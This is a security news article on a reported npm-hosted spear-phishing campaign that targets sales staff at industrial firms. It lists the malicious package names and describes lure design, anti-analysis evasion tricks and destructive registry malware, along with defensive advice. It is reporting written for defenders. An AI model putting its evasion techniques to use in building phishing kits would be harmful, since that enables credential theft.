Cybersecurity researchers have outlined a “sustained and targeted” spear-phishing operation that weaponized more than two dozen npm packages to support credential theft, effectively turning the registry into phishing infrastructure.

The campaign, which uploaded 27 npm packages under six distinct npm publisher aliases, has largely focused on sales and commercial staff working for organizations adjacent to critical infrastructure in the U.S. and allied countries, according to Socket.

“Over a five-month window, the threat actors converted 27 npm packages into stable hosting for browser-delivered lures that imitate document-sharing portals and Microsoft sign-in, targeting 25 organizations across manufacturing, industrial automation, plastics, and healthcare to steal credentials,” researchers Nicholas Anderson and Kirill Boychenko said.

The package names are as follows –

• adril7123
• ardril712
• arrdril712
• androidvoues
• assetslush
• axerification
• erification
• erificatsion
• errification
• eruification
• hgfiuythdjfhgff
• homiersla
• houimlogs22
• iuythdjfghgff
• iuythdjfhgff
• iuythdjfhgffdf
• iuythdjfhgffs
• iuythdjfhgffyg
• jwoiesk11
• modules9382
• onedrive-verification
• sarrdril712
• scriptstierium11
• secure-docs-app
• sync365
• ttetrification
• vampuleerl

Instead of relying on users installing these packages, the attackers’ primary objective is to abuse npm and package content delivery networks (CDNs) as a hosting layer. From there, they serve client-side HTML and JavaScript lures that masquerade as secure document-sharing flows, embedded directly into phishing pages. Victims are then forwarded to Microsoft sign-in pages where their email address is already populated in the login form.

Leveraging package CDNs gives the operators several defensive advantages, most notably the ability to hide behind a legitimate software distribution service that is harder to take down quickly. It also lets them pivot rapidly to new publisher aliases and package names, even after individual libraries are removed.

The packages implement several client-side checks specifically designed to frustrate analysis and automated detection, such as filtering out bots, avoiding execution in sandboxed environments, and requiring mouse or touch interaction before redirecting users to attacker-controlled credential harvesting endpoints. The JavaScript is additionally obfuscated or heavily minified to hinder automated static inspection.

Another significant anti-analysis technique used by the threat actor is the introduction of honeypot form fields that remain invisible to real users but are likely to be filled in by automated crawlers. Population of these fields serves as a secondary gate, blocking the attack flow from progressing further under analysis conditions.

Socket noted that the domains bundled within these packages intersect with adversary-in-the-middle (AitM) phishing infrastructure tied to Evilginx, an open-source phishing framework.

This is not the first time npm has been repurposed as a delivery layer for phishing. In October 2025, a software supply chain security vendor documented a campaign named Beamglea, in which unknown actors uploaded 175 malicious packages for credential theft. The current activity is assessed as a separate cluster from Beamglea, despite some conceptual similarities.

“This campaign follows a similar overall pattern but uses different delivery mechanics,” Socket said. “Rather than shipping small redirect scripts, these packages contain a full, browser-executed phishing workflow as an embedded HTML and JavaScript bundle that runs whenever it is loaded into a page context.”

In addition, the phishing packages hard-code 25 email addresses belonging to specific individuals working as account managers, sales representatives, and business development staff within manufacturing, industrial automation, plastics and polymer supply chains, and healthcare organizations across Austria, Belgium, Canada, France, Germany, Italy, Portugal, Spain, Sweden, Taiwan, Turkey, the U.K., and the U.S.

The exact source of these email addresses remains unclear. However, because many of the impacted companies participate in large international trade fairs such as Interpack and K-Fair, it is suspected that the threat actors may have scraped contact information from those event sites and enriched it with broad open-source reconnaissance.

“In several instances, the victim’s location does not match the company’s headquarters, which aligns with the actor’s emphasis on regional sales teams, country-level managers, and local commercial staff rather than central IT,” the company said.

From a defensive perspective, organizations should treat this as another supply-chain-adjacent phishing vector. Recommended controls include strict verification of third-party and transitive dependencies, logging and reviewing anomalous CDN requests originating from non-development environments, enforcing phishing-resistant multi-factor authentication (MFA), and monitoring for high-risk post-authentication behavior.

Socket also reported a consistent increase in destructive malware distributed through npm, PyPI, NuGet Gallery, and Go module indexes, often using delayed execution and remotely controlled kill switches to bypass early detection and retrieve executable payloads at runtime via standard tools like wget and curl.

“Instead of encrypting entire disks or wiping files indiscriminately, these packages generally act in a more targeted way,” researcher Kush Pandya said.

“They focus on what matters most to developers: Git repositories, source trees, configuration artifacts, and CI build outputs. The destructive logic is often embedded within otherwise legitimate code paths and triggered via standard lifecycle hooks, so the malware can execute without ever being directly imported or called by the application.”

Found this article interesting? Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post.